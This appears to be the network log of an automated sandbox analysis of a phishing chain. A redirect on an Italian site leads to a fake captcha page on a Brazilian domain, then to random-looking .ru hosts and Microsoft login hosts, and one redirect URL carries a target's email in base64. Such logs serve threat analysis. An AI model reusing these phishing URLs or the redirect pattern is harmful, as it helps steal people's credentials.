                                                                                                        Jan 9, 2025 17:19:05.524940968 CET192.168.2.171.1.1.10xea2Standard query (0)login.microsoftonline.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.548980951 CET192.168.2.171.1.1.10x127eStandard query (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ruA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.549097061 CET192.168.2.171.1.1.10xe010Standard query (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:06.601988077 CET192.168.2.171.1.1.10x8e39Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:06.602118015 CET192.168.2.171.1.1.10x4c3fStandard query (0)www.office.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:08.680102110 CET192.168.2.171.1.1.10xd091Standard query (0)www.office.comA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:08.680103064 CET192.168.2.171.1.1.10xb1afStandard query (0)www.office.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:09.774461985 CET192.168.2.171.1.1.10x509dStandard query (0)aadcdn.msftauth.netA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:09.774662971 CET192.168.2.171.1.1.10x27ceStandard query (0)aadcdn.msftauth.net65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:35.341372013 CET192.168.2.171.1.1.10xa0edStandard query (0)identity.nel.measure.office.netA (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:35.341372013 CET192.168.2.171.1.1.10x3a6aStandard query (0)identity.nel.measure.office.net65IN (0x0001)false
                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                        Jan 9, 2025 17:17:50.675827980 CET1.1.1.1192.168.2.170x1d8fNo error (0)www.teleboario.it195.201.80.48A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:52.055691957 CET1.1.1.1192.168.2.170x975cNo error (0)plasticoscorrea.com.br162.241.203.181A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:52.862822056 CET1.1.1.1192.168.2.170xd53bNo error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:52.863879919 CET1.1.1.1192.168.2.170x66bcNo error (0)use.fontawesome.comuse.fontawesome.com.cdn.cloudflare.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:53.694561005 CET1.1.1.1192.168.2.170x8856No error (0)picsum.photos65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:53.694943905 CET1.1.1.1192.168.2.170x1b0eNo error (0)picsum.photos172.67.74.163A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:53.694943905 CET1.1.1.1192.168.2.170x1b0eNo error (0)picsum.photos104.26.4.30A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:53.694943905 CET1.1.1.1192.168.2.170x1b0eNo error (0)picsum.photos104.26.5.30A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:53.954433918 CET1.1.1.1192.168.2.170x9595No error (0)plasticoscorrea.com.br162.241.203.181A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:54.737492085 CET1.1.1.1192.168.2.170xabcaNo error (0)fastly.picsum.photosdualstack.n.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:54.738662004 CET1.1.1.1192.168.2.170xeec6No error (0)fastly.picsum.photosdualstack.n.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:55.236423016 CET1.1.1.1192.168.2.170x4f1No error (0)www.google.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:55.236455917 CET1.1.1.1192.168.2.170x3053No error (0)www.google.com216.58.212.132A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:55.394146919 CET1.1.1.1192.168.2.170x9e5aNo error (0)fastly.picsum.photosdualstack.n.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:17:55.395092010 CET1.1.1.1192.168.2.170xe666No error (0)fastly.picsum.photosdualstack.n.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:00.315768957 CET1.1.1.1192.168.2.170x43d9No error (0)x1.i.lencr.orgcrl.root-x1.letsencrypt.org.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:23.847471952 CET1.1.1.1192.168.2.170x8d26No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:23.847471952 CET1.1.1.1192.168.2.170x8d26No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.39A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:23.847471952 CET1.1.1.1192.168.2.170x8d26No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.20A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:23.847471952 CET1.1.1.1192.168.2.170x8d26No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.34A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:23.847471952 CET1.1.1.1192.168.2.170x8d26No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.18A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:23.847471952 CET1.1.1.1192.168.2.170x8d26No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.36A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:23.847471952 CET1.1.1.1192.168.2.170x8d26No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.35A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:23.847471952 CET1.1.1.1192.168.2.170x8d26No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.23A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:23.847471952 CET1.1.1.1192.168.2.170x8d26No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.19A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:30.890892982 CET1.1.1.1192.168.2.170xfddbNo error (0)nokixa.qemitorn.ru104.21.58.174A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:30.890892982 CET1.1.1.1192.168.2.170xfddbNo error (0)nokixa.qemitorn.ru172.67.162.81A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:30.934773922 CET1.1.1.1192.168.2.170x5443No error (0)nokixa.qemitorn.ru65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.271733046 CET1.1.1.1192.168.2.170x9177No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.271733046 CET1.1.1.1192.168.2.170x9177No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.271733046 CET1.1.1.1192.168.2.170x9177No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.271733046 CET1.1.1.1192.168.2.170x9177No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.286190987 CET1.1.1.1192.168.2.170xeec4No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.286190987 CET1.1.1.1192.168.2.170xeec4No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.288036108 CET1.1.1.1192.168.2.170x486eNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.299787998 CET1.1.1.1192.168.2.170x976aNo error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.300154924 CET1.1.1.1192.168.2.170x963No error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:32.300154924 CET1.1.1.1192.168.2.170x963No error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.075484991 CET1.1.1.1192.168.2.170x8780No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.075484991 CET1.1.1.1192.168.2.170x8780No error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.075484991 CET1.1.1.1192.168.2.170x8780No error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.075484991 CET1.1.1.1192.168.2.170x8780No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.092395067 CET1.1.1.1192.168.2.170xb8a8No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.092873096 CET1.1.1.1192.168.2.170x8b3aNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.092873096 CET1.1.1.1192.168.2.170x8b3aNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.607243061 CET1.1.1.1192.168.2.170x6d6bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.607243061 CET1.1.1.1192.168.2.170x6d6bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.607625961 CET1.1.1.1192.168.2.170x7b9bNo error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.621596098 CET1.1.1.1192.168.2.170x12a2No error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.621596098 CET1.1.1.1192.168.2.170x12a2No error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:33.622150898 CET1.1.1.1192.168.2.170x8503No error (0)challenges.cloudflare.com65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:35.346287012 CET1.1.1.1192.168.2.170xcac9No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:36.089602947 CET1.1.1.1192.168.2.170x51d6No error (0)edge.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comdefault.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:36.089602947 CET1.1.1.1192.168.2.170x51d6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com217.20.57.27A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:36.089602947 CET1.1.1.1192.168.2.170x51d6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.21A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:36.089602947 CET1.1.1.1192.168.2.170x51d6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.20A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:36.089602947 CET1.1.1.1192.168.2.170x51d6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.35A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:36.089602947 CET1.1.1.1192.168.2.170x51d6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.38A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:36.089602947 CET1.1.1.1192.168.2.170x51d6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.37A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:36.089602947 CET1.1.1.1192.168.2.170x51d6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.34A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:18:36.089602947 CET1.1.1.1192.168.2.170x51d6No error (0)default.qdr.p1.ds-c7110-microsoft.global.dns.qwilted-cds.cqloud.com84.201.210.36A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:00.187239885 CET1.1.1.1192.168.2.170x5acfNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:00.187239885 CET1.1.1.1192.168.2.170x5acfNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.929122925 CET1.1.1.1192.168.2.170x3dbfNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.970503092 CET1.1.1.1192.168.2.170x9feNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.970503092 CET1.1.1.1192.168.2.170x9feNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.970503092 CET1.1.1.1192.168.2.170x9feNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.970503092 CET1.1.1.1192.168.2.170x9feNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.970503092 CET1.1.1.1192.168.2.170x9feNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.970503092 CET1.1.1.1192.168.2.170x9feNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:03.970503092 CET1.1.1.1192.168.2.170x9feNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.531630039 CET1.1.1.1192.168.2.170xea2No error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.531714916 CET1.1.1.1192.168.2.170x8f2aNo error (0)login.microsoftonline.comlogin.mso.msidentity.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.598437071 CET1.1.1.1192.168.2.170xe010No error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru65IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.756207943 CET1.1.1.1192.168.2.170x127eNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.96.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.756207943 CET1.1.1.1192.168.2.170x127eNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.64.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.756207943 CET1.1.1.1192.168.2.170x127eNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.48.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.756207943 CET1.1.1.1192.168.2.170x127eNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.32.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.756207943 CET1.1.1.1192.168.2.170x127eNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.112.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.756207943 CET1.1.1.1192.168.2.170x127eNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.80.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:05.756207943 CET1.1.1.1192.168.2.170x127eNo error (0)fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru104.21.16.1A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:06.608783007 CET1.1.1.1192.168.2.170x8e39No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:06.608783007 CET1.1.1.1192.168.2.170x8e39No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:06.609076977 CET1.1.1.1192.168.2.170x4c3fNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:06.609076977 CET1.1.1.1192.168.2.170x4c3fNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:07.762583017 CET1.1.1.1192.168.2.170x30f8No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:07.762583017 CET1.1.1.1192.168.2.170x30f8No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:08.658112049 CET1.1.1.1192.168.2.170x5afaNo error (0)shed.dual-low.s-part-0016.t-0009.t-msedge.netazurefd-t-fb-prod.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:08.658112049 CET1.1.1.1192.168.2.170x5afaNo error (0)dual.s-part-0016.t-0009.fb-t-msedge.nets-part-0016.t-0009.fb-t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:08.658112049 CET1.1.1.1192.168.2.170x5afaNo error (0)s-part-0016.t-0009.fb-t-msedge.net13.107.253.44A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:08.686892033 CET1.1.1.1192.168.2.170xd091No error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:08.686892033 CET1.1.1.1192.168.2.170xd091No error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:08.689701080 CET1.1.1.1192.168.2.170xb1afNo error (0)www.office.comhome-portal.office.comCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:08.689701080 CET1.1.1.1192.168.2.170xb1afNo error (0)home-portal.office.comhome-office365-com.b-0004.b-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:09.781598091 CET1.1.1.1192.168.2.170x509dNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:09.781598091 CET1.1.1.1192.168.2.170x509dNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:09.781598091 CET1.1.1.1192.168.2.170x509dNo error (0)sni1gl.wpc.omegacdn.net152.199.21.175A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:09.782593012 CET1.1.1.1192.168.2.170x27ceNo error (0)aadcdn.msftauth.netscdn38e6f.wpc.9be8f.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:09.782593012 CET1.1.1.1192.168.2.170x27ceNo error (0)scdn38e6f.wpc.9be8f.omegacdn.netsni1gl.wpc.omegacdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:35.348871946 CET1.1.1.1192.168.2.170x3a6aNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:35.348908901 CET1.1.1.1192.168.2.170xa0edNo error (0)identity.nel.measure.office.netnel.measure.office.net.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:48.354542017 CET1.1.1.1192.168.2.170x9714No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                        Jan 9, 2025 17:19:48.354542017 CET1.1.1.1192.168.2.170x9714No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                        • www.teleboario.it
                                                                                                        • plasticoscorrea.com.br
                                                                                                        • https:
                                                                                                          • picsum.photos
                                                                                                          • nokixa.qemitorn.ru
                                                                                                          • cdnjs.cloudflare.com
                                                                                                          • challenges.cloudflare.com
                                                                                                          • code.jquery.com
                                                                                                          • fx2zge2sjqixdzx1wnxr2tfetu7u4egx5odlhjxarfaqxx9o6nst.gageodeg.ru
                                                                                                        • a.nel.cloudflare.com
                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        0192.168.2.1749704195.201.80.484431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:17:51 UTC787OUTGET /teleboario_adv.php?variable=403&url=%2F%2Fplasticoscorrea.com.br%2Fscript%2F%23Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t HTTP/1.1
                                                                                                        Host: www.teleboario.it
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-User: ?1
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:17:51 UTC334INHTTP/1.1 302 Found
                                                                                                        Date: Thu, 09 Jan 2025 16:17:51 GMT
                                                                                                        Server: Apache
                                                                                                        Set-Cookie: adv_popup=true; expires=Thu, 09-Jan-2025 16:27:51 GMT; Max-Age=600; path=/
                                                                                                        Location: //plasticoscorrea.com.br/script/#Y2xpZW50cmVsYXRpb25zQGFwcHJhaXNhbC1uYXRpb24uY29t
                                                                                                        Content-Length: 0
                                                                                                        Connection: close
                                                                                                        Content-Type: text/html; charset=UTF-8


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        1192.168.2.1749708162.241.203.1814431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:17:52 UTC672OUTGET /script/ HTTP/1.1
                                                                                                        Host: plasticoscorrea.com.br
                                                                                                        Connection: keep-alive
                                                                                                        Upgrade-Insecure-Requests: 1
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                        Sec-Fetch-Site: none
                                                                                                        Sec-Fetch-Mode: navigate
                                                                                                        Sec-Fetch-User: ?1
                                                                                                        Sec-Fetch-Dest: document
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        2025-01-09 16:17:52 UTC382INHTTP/1.1 200 OK
                                                                                                        Date: Thu, 09 Jan 2025 16:17:52 GMT
                                                                                                        Server: Apache
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        Set-Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc; path=/
                                                                                                        Upgrade: h2,h2c
                                                                                                        Connection: Upgrade, close
                                                                                                        Vary: Accept-Encoding
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        2025-01-09 16:17:52 UTC6250INData Raw: 31 38 35 64 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 2f 3e 0a 20 20 3c 74 69 74 6c 65 3e 43 61 70 74 63 68 61 20 50 72 6f 74 65 63 74 69 6f 6e 20 2d 20 53 6c 69 64 65 72 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 2f 3e 0a 20 20 0a 20 20 3c 6c 69 6e 6b 0a 20 20 20 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 0a 20 20 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 75 73 65 2e 66 6f 6e 74
                                                                                                        Data Ascii: 185d<!DOCTYPE html><html><head> <meta charset="utf-8"/> <title>Captcha Protection - Slider</title> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"/> <link rel="stylesheet" href="https://use.font


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        2192.168.2.1749710162.241.203.1814431864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-09 16:17:53 UTC631OUTGET /script/disk/slidercaptcha.css HTTP/1.1
                                                                                                        Host: plasticoscorrea.com.br
                                                                                                        Connection: keep-alive
                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                        Accept: text/css,*/*;q=0.1
                                                                                                        Sec-Fetch-Site: same-origin
                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                        Sec-Fetch-Dest: style
                                                                                                        Referer: https://plasticoscorrea.com.br/script/
                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                        Cookie: PHPSESSID=bf70b430a5a5e9435aa4ab5a5d9f39fc
